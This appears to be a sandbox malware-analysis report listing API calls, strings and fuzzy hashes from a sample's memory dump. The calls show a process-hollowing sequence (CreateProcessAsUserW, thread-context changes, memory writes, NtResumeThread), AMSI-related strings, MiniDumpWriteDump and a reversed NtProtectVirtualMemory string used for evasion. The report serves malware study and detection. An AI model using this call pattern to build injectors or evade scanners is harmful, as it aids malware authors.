                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0289AC56
                                                                            • Process32First.KERNEL32(?,00000128), ref: 0289ADC9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$FirstHandleModuleProcess32
                                                                            • String ID:
                                                                            • API String ID: 2774106396-0
                                                                            • Opcode ID: 457727699e03df20e42a8b202bf57f9d42f96a33bef81b70bd6e2953a39d30be
                                                                            • Instruction ID: 640b0be72fb7a89904f1106197792a4529a53825328cdc6022f9e2f4ee7f2ee1
                                                                            • Opcode Fuzzy Hash: 457727699e03df20e42a8b202bf57f9d42f96a33bef81b70bd6e2953a39d30be
                                                                            • Instruction Fuzzy Hash: D3C08CBA7122201B8F1476FC3CC89D7878ECD4A1B730C08A2F50CE3502E7258C20A2E0
                                                                            APIs
                                                                              • Part of subcall function 0289AB1C: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,0289ADA3,?,?,0289AE35,00000000,0289AF11), ref: 0289AB30
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0289AB48
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0289AB5A
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 0289AB6C
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 0289AB7E
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 0289AB90
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 0289ABA2
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Process32First), ref: 0289ABB4
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0289ABC6
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 0289ABD8
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 0289ABEA
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 0289ABFC
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 0289AC0E
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Module32First), ref: 0289AC20
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0289AC32
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 0289AC44
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0289AC56
                                                                            • Process32Next.KERNEL32(?,00000128), ref: 0289ADE9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$HandleModuleNextProcess32
                                                                            • String ID:
                                                                            • API String ID: 2237597116-0
                                                                            • Opcode ID: 9fd3e7badfb49f83001988007db88f5666a3b93a8b80733c3a5f8e1f25d4f4c5
                                                                            • Instruction ID: cc9e7b1498aebffdb9c769b903b30786c68eae011ba8ec9321b5977220372456
                                                                            • Opcode Fuzzy Hash: 9fd3e7badfb49f83001988007db88f5666a3b93a8b80733c3a5f8e1f25d4f4c5
                                                                            • Instruction Fuzzy Hash: 81C08CBA7122301B8E1476FC3CC89E7878DCD4A1B730848A2F508E3102DB258C10A2E0
                                                                            APIs
                                                                            • GetFileAttributesA.KERNEL32(00000000,?,028A356F,ScanString,02907380,028AB7B8,OpenSession,02907380,028AB7B8,ScanBuffer,02907380,028AB7B8,OpenSession,02907380,028AB7B8,Initialize), ref: 02887E8B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
                                                                            • Instruction ID: ec9884531c3e3ccda95a820e9017a88abe60369ad0b245e5968ac6c3ed697030
                                                                            • Opcode Fuzzy Hash: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
                                                                            • Instruction Fuzzy Hash: ABC08CFF2112010A1E60F5FC1CC4319428909841357701E61E47CCA2D2E3169C222822
APIs
• GetFileAttributesA.KERNEL32(00000000,?,028A041F,ScanString,02907380,028AB7B8,OpenSession,02907380,028AB7B8,ScanString,02907380,028AB7B8,UacScan,02907380,028AB7B8,UacInitialize), ref: 02887E67
Memory Dump Source
• Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
• Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
• Instruction ID: ff54af9b85b2af65e55052f2f87a67da4c95a3eebf24ebf9caa91ba30a2419a3
• Opcode Fuzzy Hash: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
• Instruction Fuzzy Hash: FBC08CAE2012000A5A60F5BC2CC4249528A0D042793740A61A43CC62E2E32298A22812
APIs
Memory Dump Source
• Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
• Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
Similarity
• API ID: FreeString
• String ID:
• API String ID: 3341692771-0
• Opcode ID: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
• Instruction ID: e498962e026e30251142ccf76b466b57a35878db71b7319f4a7a9dcb3ee3d2e8
• Opcode Fuzzy Hash: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
• Instruction Fuzzy Hash: 29C012AF60023157FB21AA9DACC475262CD9B052A5F1400A1D508D7250E7749C0047A1
APIs
• timeSetEvent.WINMM(00002710,00000000,028AC350,00000000,00000001), ref: 028AC36C
Memory Dump Source
• Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
• Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
Similarity
• API ID: Eventtime
• String ID:
• API String ID: 2982266575-0
• Opcode ID: b1f87e6a74a361135eab9c192d36d5b4bff88b2f3d030cd1c53168b511ffebcc
• Instruction ID: 3ae276e00207e238fc391cf3c29dec3e2cf118ae97fe36c06001aaa7d4c27679
• Opcode Fuzzy Hash: b1f87e6a74a361135eab9c192d36d5b4bff88b2f3d030cd1c53168b511ffebcc
• Instruction Fuzzy Hash: 5DC092F97943003EFA50AAA99CE2F3316ADD349B10F141412B708EE2C2E6E368104E68
APIs
• SysAllocStringLen.OLEAUT32(00000000,?), ref: 02884C3F
Memory Dump Source
• Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
• Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
Similarity
• API ID: AllocString
• String ID:
• API String ID: 2525500382-0
• Opcode ID: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
• Instruction ID: fdf90b06bd16590d9cca406ffb8d1a6ccd14507ce152a1ff83e47bb12d03c651
• Opcode Fuzzy Hash: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
• Instruction Fuzzy Hash: AAB0123E28824B55FA9832A20F00773048E0B4028AF8400519F1CC80D4FF10C0029837
APIs
• SysFreeString.OLEAUT32(00000000), ref: 02884C57
Memory Dump Source
• Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
• Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
Similarity
• API ID: FreeString
• String ID:
• API String ID: 3341692771-0
• Opcode ID: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
• Instruction ID: f7de8dc58bb9b7e5358cbdd3078b855a4efef4c24920cb8665af446868e55dc5
• Opcode Fuzzy Hash: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
• Instruction Fuzzy Hash: 72A022AC0003030AEF0B332C002002F223B3FE03003CAC0E88308CA0008F3A8002AE32
APIs
• VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02881A03,?,02881FC1), ref: 028815E2
Memory Dump Source
• Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
• Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: bd4e29b37d0e8be0931b2cd0d49a18b52b35cbd138d7d17561f78a42675c8bdd
• Instruction ID: 56e8f371fdc4f91fedd5d15289a89f212d12dd10484b92f8efd186a18233872a
• Opcode Fuzzy Hash: bd4e29b37d0e8be0931b2cd0d49a18b52b35cbd138d7d17561f78a42675c8bdd
• Instruction Fuzzy Hash: 58F06DF4B463008FDB0ADFB99A843117BE6E78A344F108679D709DB398EB71A4028B00
APIs
• VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02881FC1), ref: 028816A4
Memory Dump Source
• Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
• Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: b60633ee20bf0b18f00a39f16a1f4a17a1c29a36b93838024a58d79907b3bc3a
• Instruction ID: a448362a302dab5fbc4552adfce6735cb8e74bf828edb679c4e7dc60971d62c5
• Opcode Fuzzy Hash: b60633ee20bf0b18f00a39f16a1f4a17a1c29a36b93838024a58d79907b3bc3a
• Instruction Fuzzy Hash: 89F090B6B447996FD7119E5A9CC4792BB98FB40314F050139E94C97345D770A8218B94
APIs
• VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02881FE4), ref: 02881704
Memory Dump Source
• Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
• Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
Similarity
• API ID: FreeVirtual
• String ID:
• API String ID: 1263568516-0
• Opcode ID: 0e481fdedbc48ef944bef2497688993035bf94962630d3df3ad649c9dbc17b7f
• Instruction ID: 2f42ddadefe7c4ed6e4b67c4de7942ff6a84e99aa283ae9a6696e879940b9025
• Opcode Fuzzy Hash: 0e481fdedbc48ef944bef2497688993035bf94962630d3df3ad649c9dbc17b7f
• Instruction Fuzzy Hash: 91E0867D300301AFD7107A7D5D88712ABDCEB44654F144479F549DB245DB60E8118B61
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,00000002,0289ADA3,?,?,0289AE35,00000000,0289AF11), ref: 0289AB30
• GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0289AB48
• GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0289AB5A
• GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 0289AB6C
• GetProcAddress.KERNEL32(00000000,Heap32First), ref: 0289AB7E
• GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 0289AB90
• GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 0289ABA2
• GetProcAddress.KERNEL32(00000000,Process32First), ref: 0289ABB4
• GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0289ABC6
• GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 0289ABD8
• GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 0289ABEA
• GetProcAddress.KERNEL32(00000000,Thread32First), ref: 0289ABFC
• GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 0289AC0E
• GetProcAddress.KERNEL32(00000000,Module32First), ref: 0289AC20
• GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0289AC32
• GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 0289AC44
• GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0289AC56
Strings
Memory Dump Source
• Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
• Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
• API String ID: 667068680-597814768
• Opcode ID: ab1257d12a64c65aacb44dff1267a286ea4847cccd453918f8f4bea181eee5f9
• Instruction ID: dacba40c3a1ae5fc629db93ab3bffc0ad8c13b6f40029502d036bab9d200b51f
• Opcode Fuzzy Hash: ab1257d12a64c65aacb44dff1267a286ea4847cccd453918f8f4bea181eee5f9
• Instruction Fuzzy Hash: AD31FFBCA943A49FFF54EBB8D8C4AAD73ACAF157157040D61A401DF209E678B810CF12
                                                                            APIs
                                                                              • Part of subcall function 028989D0: FreeLibrary.KERNEL32(74AE0000,00000000,00000000,00000000,00000000,0290738C,Function_0000662C,00000004,0290739C,0290738C,05F5E103,00000040,029073A0,74AE0000,00000000,00000000), ref: 02898AAA
                                                                              • Part of subcall function 02898788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02898814
                                                                            • GetThreadContext.KERNEL32(00000000,02907424,ScanString,029073A8,0289A93C,UacInitialize,029073A8,0289A93C,ScanBuffer,029073A8,0289A93C,ScanBuffer,029073A8,0289A93C,UacInitialize,029073A8), ref: 02899602
                                                                              • Part of subcall function 02897A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02897A9F
                                                                              • Part of subcall function 02897D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02897DEC
                                                                            • SetThreadContext.KERNEL32(00000000,02907424,ScanBuffer,029073A8,0289A93C,ScanString,029073A8,0289A93C,Initialize,029073A8,0289A93C,00000000,-00000008,029074FC,00000004,02907500), ref: 0289A317
                                                                            • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,02907424,ScanBuffer,029073A8,0289A93C,ScanString,029073A8,0289A93C,Initialize,029073A8,0289A93C,00000000,-00000008,029074FC), ref: 0289A324
                                                                              • Part of subcall function 0289894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,029073A8,0289A587,ScanString,029073A8,0289A93C,ScanBuffer,029073A8,0289A93C,Initialize,029073A8,0289A93C,UacScan), ref: 02898960
                                                                              • Part of subcall function 0289894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 0289897A
                                                                              • Part of subcall function 0289894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,029073A8,0289A587,ScanString,029073A8,0289A93C,ScanBuffer,029073A8,0289A93C,Initialize), ref: 028989B6
                                                                            Strings
Memory Dump Source
• Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
• Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
Similarity
• API ID: LibraryThread$ContextFreeMemoryVirtual$AddressAllocateCreateLoadProcProcessResumeUserWrite
• String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
• API String ID: 2624078988-51457883
APIs
  • Part of subcall function 028989D0: FreeLibrary.KERNEL32(74AE0000,00000000,00000000,00000000,00000000,0290738C,Function_0000662C,00000004,0290739C,0290738C,05F5E103,00000040,029073A0,74AE0000,00000000,00000000), ref: 02898AAA
  • Part of subcall function 02898788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02898814
• GetThreadContext.KERNEL32(00000000,02907424,ScanString,029073A8,0289A93C,UacInitialize,029073A8,0289A93C,ScanBuffer,029073A8,0289A93C,ScanBuffer,029073A8,0289A93C,UacInitialize,029073A8), ref: 02899602
  • Part of subcall function 02897A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02897A9F
Similarity
• API ID: AllocateContextCreateFreeLibraryMemoryProcessThreadUserVirtual
• String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
• API String ID: 4276370345-51457883
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,02886C14,02880000,028AE790), ref: 02885925
• GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 0288593C
• lstrcpynA.KERNEL32(?,?,?), ref: 0288596C
• lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02886C14,02880000,028AE790), ref: 028859D0
• lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02886C14,02880000,028AE790), ref: 02885A06
• FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02886C14,02880000,028AE790), ref: 02885A19
• FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02886C14,02880000,028AE790), ref: 02885A2B
• lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02886C14,02880000,028AE790), ref: 02885A37
• lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02886C14,02880000), ref: 02885A6B
• lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02886C14), ref: 02885A77
• lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02885A99
Similarity
• API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
• String ID: GetLongPathNameA$\$kernel32.dll
• API String ID: 3245196872-1565342463
APIs
• lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02885BE8
• GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02885BF5
• GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02885BFB
• lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02885C26
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02885C6D
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02885C7D
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02885CA5
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02885CB5
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02885CDB
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02885CEB
Similarity
• API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
• String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
• API String ID: 1599918012-2375825460
APIs
  • Part of subcall function 028981CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,0289823C,?,?,00000000,?,02897A7E,ntdll,00000000,00000000,02897AC3,?,?,00000000), ref: 0289820A
  • Part of subcall function 028981CC: GetModuleHandleA.KERNELBASE(?), ref: 0289821E
  • Part of subcall function 02898274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,028982FC,?,?,00000000,00000000,?,02898215,00000000,KernelBASE,00000000,00000000,0289823C), ref: 028982C1
  • Part of subcall function 02898274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 028982C7
  • Part of subcall function 02898274: GetProcAddress.KERNEL32(?,?), ref: 028982D9
• NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 02898539
Similarity
• API ID: HandleModule$AddressProc$MemoryProtectVirtual
• String ID: ntdll$yromeMlautriVtcetorPtN
• API String ID: 3897345246-351734974
APIs
• GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02887FF5
Similarity
• API ID: DiskFreeSpace
• String ID:
• API String ID: 1705453755-0
APIs
• GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0288A7E2
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
APIs
